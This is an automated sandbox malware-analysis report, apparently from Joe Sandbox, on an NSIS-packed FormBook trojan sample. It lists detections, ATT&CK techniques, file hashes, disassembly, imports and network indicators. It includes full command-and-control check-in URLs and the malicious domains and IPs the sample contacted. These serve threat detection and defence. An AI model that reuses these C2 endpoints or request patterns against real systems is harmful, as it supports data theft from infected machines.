Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Native API	Path Interception	612 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	612 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tM32bSteJD.exe	50%	Virustotal		Browse
tM32bSteJD.exe	42%	ReversingLabs	Win32.Trojan.Risis
tM32bSteJD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsv6BBF.tmp\pmtkix.dll	40%	ReversingLabs	Win32.Trojan.Midie

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.0.tM32bSteJD.exe.400000.2.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
11.2.wscript.exe.5b8d58.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.0.tM32bSteJD.exe.400000.3.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
4.0.tM32bSteJD.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.2.wscript.exe.4f4796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.0.tM32bSteJD.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.0.tM32bSteJD.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
2.2.tM32bSteJD.exe.2200000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.0.tM32bSteJD.exe.400000.1.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
4.0.tM32bSteJD.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
4.2.tM32bSteJD.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.sharingtechnology.net/ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX	100%	Avira URL Cloud	malware
http://www.partumball.com/ndf8/?r48X=ggw9hHOBDDdESRr+AgwRlMKcO473LY4IfLFd6/0WA0ZukpfiF712g3X0dfEv6OyyQaoN&ihe4W=5jMxZX	0%	Avira URL Cloud	safe
http://www.zenginbilgiler.com/ndf8/?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX	100%	Avira URL Cloud	malware
http://www.safepostcourier.com/ndf8/?r48X=Jkb3qULodAPsbwEkWvkNxdGDgcgioern+VdRvmK2C6x/Zi+k8aFahwHydMBBXChJ4TlK&ihe4W=5jMxZX	0%	Avira URL Cloud	safe
http://www.theangularteam.com/ndf8/?r48X=UDlWqClyQYAxvw1qhQyotXnG6StVuzlosSzrK5RtNenfTIGzfkaW05z+heFbWRXNUIb8&ihe4W=5jMxZX	0%	Avira URL Cloud	safe
http://www.pawastreams.com/ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX	100%	Avira URL Cloud	malware
http://www.mindfulagilecoaching.com/ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX	100%	Avira URL Cloud	malware
www.pawastreams.com/ndf8/	100%	Avira URL Cloud	malware
http://www.bethesdagardensloveland.com/ndf8/?r48X=ivAFo0A+NqvrlfwHnO69DiIiTNfvi2ac6XE5GsUcPQCQwjrhO7vznBZ3k8qerGpNfj8C&ihe4W=5jMxZX	0%	Avira URL Cloud	safe
http://www.bestpicture-toglancetoday.info/ndf8/?r48X=3cYFrCEtfJlcg4ld1aVHN5gMYg5Zt2FExUyTFUcyhukshY2DzeoXaRCbeMAEi8U22TkD&ihe4W=5jMxZX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
proxy-ssl-geo.webflow.com	52.49.198.28	true	false	high
www.moneylovepig.com	183.181.96.116	true	true	unknown
theangularteam.com	34.102.136.180	true	false	unknown
www.rezzo-jazzavienne.com	195.15.216.57	true	false	unknown
zenginbilgiler.com	45.144.154.230	true	true	unknown
safepostcourier.com	192.64.118.79	true	true	unknown
www.bestpicture-toglancetoday.info	54.203.72.218	true	true	unknown
partumball.com	34.102.136.180	true	false	unknown
mindfulagilecoaching.com	198.46.81.209	true	true	unknown
www.pawastreams.com	103.224.182.241	true	true	unknown
sharingtechnology.net	192.185.16.42	true	true	unknown
www.zenginbilgiler.com	unknown	unknown	true	unknown
www.bethesdagardensloveland.com	unknown	unknown	true	unknown
www.partumball.com	unknown	unknown	true	unknown
www.theangularteam.com	unknown	unknown	true	unknown
www.sharingtechnology.net	unknown	unknown	true	unknown
www.safepostcourier.com	unknown	unknown	true	unknown
www.mindfulagilecoaching.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sharingtechnology.net/ndf8/?r48X=BfPqRrZi1Nvegs+cj2EDIZW0ahYu65pOTruxY8XtQ+p4cMRjfZYnI7scWEyi9dGt37iK&ihe4W=5jMxZX	true	Avira URL Cloud: malware	unknown
http://www.partumball.com/ndf8/?r48X=ggw9hHOBDDdESRr+AgwRlMKcO473LY4IfLFd6/0WA0ZukpfiF712g3X0dfEv6OyyQaoN&ihe4W=5jMxZX	false	Avira URL Cloud: safe	unknown
http://www.zenginbilgiler.com/ndf8/?r48X=L//HOLm6eVpZsv6wHqdDx/pXwzG7nIq0F46X6LZeKEBinnMUqCblDJYQdI12cZc6z1z4&ihe4W=5jMxZX	true	Avira URL Cloud: malware	unknown
http://www.safepostcourier.com/ndf8/?r48X=Jkb3qULodAPsbwEkWvkNxdGDgcgioern+VdRvmK2C6x/Zi+k8aFahwHydMBBXChJ4TlK&ihe4W=5jMxZX	true	Avira URL Cloud: safe	unknown
http://www.theangularteam.com/ndf8/?r48X=UDlWqClyQYAxvw1qhQyotXnG6StVuzlosSzrK5RtNenfTIGzfkaW05z+heFbWRXNUIb8&ihe4W=5jMxZX	false	Avira URL Cloud: safe	unknown
http://www.pawastreams.com/ndf8/?r48X=RCeNT3WkEnXVD15B0umhKW1HWEsk0Lwf2Jc1jyix6D3p3K2Ri/EfFXI6896QSMfxSYQR&ihe4W=5jMxZX	true	Avira URL Cloud: malware	unknown
http://www.mindfulagilecoaching.com/ndf8/?r48X=P14lpjMoYzWbnBnDYYNCg6ClQxLmCCxAShWV0WGNcgOa+TLBjJIe66h8Y64JomzHb8Hi&ihe4W=5jMxZX	true	Avira URL Cloud: malware	unknown
www.pawastreams.com/ndf8/	true	Avira URL Cloud: malware	low
http://www.bethesdagardensloveland.com/ndf8/?r48X=ivAFo0A+NqvrlfwHnO69DiIiTNfvi2ac6XE5GsUcPQCQwjrhO7vznBZ3k8qerGpNfj8C&ihe4W=5jMxZX	true	Avira URL Cloud: safe	unknown
http://www.bestpicture-toglancetoday.info/ndf8/?r48X=3cYFrCEtfJlcg4ld1aVHN5gMYg5Zt2FExUyTFUcyhukshY2DzeoXaRCbeMAEi8U22TkD&ihe4W=5jMxZX	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	tM32bSteJD.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	tM32bSteJD.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.64.118.79	safepostcourier.com	United States	22612	NAMECHEAP-NETUS	true
198.46.81.209	mindfulagilecoaching.com	United States	54641	INMOTI-1US	true
54.203.72.218	www.bestpicture-toglancetoday.info	United States	16509	AMAZON-02US	true
34.102.136.180	theangularteam.com	United States	15169	GOOGLEUS	false
103.224.182.241	www.pawastreams.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
52.49.198.28	proxy-ssl-geo.webflow.com	United States	16509	AMAZON-02US	false
192.185.16.42	sharingtechnology.net	United States	46606	UNIFIEDLAYER-AS-1US	true
45.144.154.230	zenginbilgiler.com	Germany	33657	CMCSUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	563133
Start date:	31.01.2022
Start time:	09:02:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 48s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	tM32bSteJD.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/4@11/9
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 64.5% (good quality ratio 59.6%) Quality average: 72.2% Quality standard deviation: 30.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information

Process:	C:\Users\user\Desktop\tM32bSteJD.exe
File Type:	data
Category:	dropped
Size (bytes):	218608
Entropy (8bit):	7.994342900612192
Encrypted:	true
SSDEEP:	6144:SdFbmruDFJg6aSStb/VQhgW7wwEDjGe8IHT5z:SdF6ruHISEbUame8Ilz
MD5:	4E72F9F648C7D4E72D33A9212C2A9D39
SHA1:	377A23D6D05E9A1679015E91130A5CAF79E2414C
SHA-256:	2CFE877A8B84D07934CD9118DAC9D8075D01A6C19761138B99B531CC5F5779DB
SHA-512:	E18FF7B99AD1DDAF97315F6FCD8FF98525A4F9DE5A455CC8C9DE884FA8CCA26884DCFED94E72864005AA9D6925ABE14BC661B104E4C47D1B19F028C47FF11F93
Malicious:	false
Reputation:	low
Preview:	... ...t.<.~>..$...Y...G-........c~&.e... .G......)xm+..1g...Y...C! ;.P...]f.#..G.+`)~..s`..l~..T.'.D..{G$AF.N>$...........o..e..!\.b..m...tj..........l<3...q....&;A_^h..........#1?cq.G]......d..#..K..H.R.....Y'...w..o........$.FM.M.@!(b6....Lz<+...2#........t..B.xD\...Y=..q..u......c.&..... ........)xm+..1g..Y.K.. -$.?..@.=.........v.&..2........M.B,.X..L.M..O...,....o...:....8Ih....ve..Q'.$.{....S?.l...C.4i.<....JD.;#1?..3G.m...k_..#..K....3.C...!.\|1.w..o....+...H.FM.U.@!.b6?...$z<..n.2#....5...t..?.x.\...Y...4..{......c~&.e... .G......)xm+..1g..Y.K.. -$.?..@.=.........v.&..2........M.B,.X..L.M..O...,....o...:....8Ih....ve..Q'.$.{....S?.l...C.4i.<.......#1?..G......0_..#..K....3.C...Y.\|..w..o....+...H.FM.U.@!.b6?...$z<..n.2#....5...t..?.x.\...Y...4..{......c~&.e... .G......)xm+..1g..Y.K.. -$.?..@.=.........v.&..2........M.B,.X..L.M..O...,....o..*.:....8Ih....ve..Q'.$.{....S?.l...C.4i.<.......#1?..G......0_..#..K....3.C...Y.\|..w..o....+...H.F

C:\Users\user\AppData\Local\Temp\nsv6BBE.tmp

Download File

Process:	C:\Users\user\Desktop\tM32bSteJD.exe
File Type:	data
Category:	dropped
Size (bytes):	274151
Entropy (8bit):	7.604193820093223
Encrypted:	false
SSDEEP:	6144:sCiJ5SdFbmruDFJg6aSStb/VQhgW7wwEDjGe8IHT5M71a:LEYdF6ruHISEbUame8Ilwa
MD5:	8021CF8A13039E2CD338248B0033603A
SHA1:	1D1B9373A84A9365A33CC0C924D9D3B0E075B36E
SHA-256:	043E7A13CF9E984E77716AA57F7890537305ABBDB0AB76E65AE61FBFE3CB95DB
SHA-512:	2541FA4871F10EE0A2A8384735649D4D24A1AB1F0C3901E4E87E56A04C7BEFA4D8BC11B81209A5C6C25455C6F122D1FCF78499950ED96D3D8B7DA9738FEC6137
Malicious:	false
Reputation:	low
Preview:	.}......,.......................\|_......*\|.......\|..............................................................F...........................................................................................................................................................................J...................j...............................................................................................................................{...........b...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv6BBF.tmp\pmtkix.dll

Download File

Process:	C:\Users\user\Desktop\tM32bSteJD.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18432
Entropy (8bit):	5.8231306707358
Encrypted:	false
SSDEEP:	384:ERJ5YQUq/6vARAa5OW2xbj11RRNaicIhI1z5plEeNiRg9o:ERhxS4R6xHRDaL8arlwn
MD5:	CE596D4E7B4B245DB309B1B623224007
SHA1:	43BE7A62EC59A3840E068804B586A8A4E120EB45
SHA-256:	C8EA1DEC9C0638BC133A1958552A697D6F420CCF7BDE149722A01FE718926C37
SHA-512:	723625756169A56C43DDF465AD4F064684997B8A2F771979B697C717E998522553109159090D34C26AC7B202AC53128E2A177B7A55F471803E9F0CB6370E6534
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H...#...H...H..H..k....H..k....H..n.!..H..k....H..Rich.H..........................PE..L......a...........!.....6...................P............................................@.........................0Q..H...xQ.......`.......................p.......................................................P..0............................text....5.......6.................. ..`.rdata..l....P.......:..............@..@.rsrc........`.......D..............@..@.reloc.......p.......F..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qebpmeyoat

Download File

Process:	C:\Users\user\Desktop\tM32bSteJD.exe
File Type:	data
Category:	dropped
Size (bytes):	5079
Entropy (8bit):	6.147564086264804
Encrypted:	false
SSDEEP:	48:fcLmu5TzwM66jtg/DgyFW+f/vs3SAp6NFYCZl8msEs3y4SxctzlYZ4qcZNDSIsvD:EK8jjtgbzW+f/EdQP8m14rNlG7YqNkY3
MD5:	7AB853564BE95E40428B74E774A02B17
SHA1:	CC96C98182B7E0D39C0BCA689FB2BA9C06686F68
SHA-256:	236AC9967CF2206F4D63702415C26D087FD242F8668CCBDFD958FEBDE2302DCC
SHA-512:	D2A48B4958CEA858C793F2F4EEECA5D746EC5836311736F91963CB2D57364B0111A397488FE7D98C3A88734F27E4F2AD34ED974CF3DB6F657C2A9DB0553CA331
Malicious:	false
Preview:	+$...I(Q(\|...Q.,............4Q.........Q....G.G.O..4....K.$K...G.G.O..44...K..K. .G.G.O..4!...K..K...G.G.O..4....K..K..Q?..Fz.......[K..K.0I..Q4..K.4K.(I.4I..O..."....I.4..O..K....K..Q0,..4....Q......G$..G...G....G....G...G4.W.@..I...K...Q..G,.G$..I....K.,..4..........Q....I....I.,...I7....I(........I..I.y..A.I..I.I..I..K..I...K..I..I.\|I..K.I..I..I7......=4D..4........=4...4.......Y=4...4......I(Q(......4......O.$K..Q?.@.I.....I..\|K..I..K..)04...W.@.I..[.....K..$K...O.4[...3.K..$K.........O..$.....=4#...4....K..).O.4..G.4....K..Q?..@.Q.,.)...,...I.,I7....I(Q(\|.....4.......O..K..Q?.@.I.....I..\|K..I..K..)04...W..PJ...I..[.....K...K...I..[...3.K...K...I..[..#3K...K...I.......".K...K...O.4[...3.K...K.........O.......=46....41...K..Q?.@.I.4I..K.).G.G.G.G.G.4....K..Q?..@.Q.,.)...,...I.,I7...I(Q(.......O.0K..Q?.@.I.....I..\|K..I..K..)04...W.@.I..[.....K..0K..4I..[...3.K..0K..4......O..0...Y=4.....4..K..).G

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.931748994401155
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tM32bSteJD.exe
File size:	256442
MD5:	fe1b3c933234d3a68d7b0722a177ba07
SHA1:	7a2c6caf667483e57b9c183935e83c435ff5efd4
SHA256:	89a5384b284e44d23891f6b22590f0194c4ac0b2b6507bb51fa678ede6d6069a
SHA512:	6c348997afe6d4a559a49a93eb7e9d1d27c6b81d48ada5113f6a59ad6f7df69bb69cdc6a65e9e2a86e26b640efb39d73582a92dc43c414e06b341be7e680e22d
SSDEEP:	6144:ow38qXVTL9hNN8ZEqspBLWWuzxpZcUgcWmATFr:t1hNm+pBipZcgKt
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x403225
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409128h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F8A70A6FD40h
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F450h
call dword ptr [00407158h]
push 004091B0h
push 004236A0h
call 00007F8A70A6F9F7h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F8A70A6F9E5h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F8A70A6D20Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F8A70A6F4D8h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F8A70A6D265h
cmp cl, 00000020h
jne 00007F8A70A6D208h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F8A70A6D1FCh
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5976	0x5a00	False	0.668619791667	data	6.46680044621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444878472222	data	5.17796812871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55078125	data	4.68983486809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x900	0xa00	False	0.409375	data	3.94693169534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c190	0x2e8	data	English	United States
RT_DIALOG	0x2c478	0x100	data	English	United States
RT_DIALOG	0x2c578	0x11c	data	English	United States
RT_DIALOG	0x2c698	0x60	data	English	United States
RT_GROUP_ICON	0x2c6f8	0x14	data	English	United States
RT_MANIFEST	0x2c710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/31/22-09:04:51.277000	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49767	34.102.136.180	192.168.2.3
01/31/22-09:05:01.905293	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.2.3	103.224.182.241
01/31/22-09:05:01.905293	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.2.3	103.224.182.241
01/31/22-09:05:01.905293	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49796	80	192.168.2.3	103.224.182.241
01/31/22-09:05:07.420793	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49797	80	192.168.2.3	54.203.72.218
01/31/22-09:05:07.420793	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49797	80	192.168.2.3	54.203.72.218
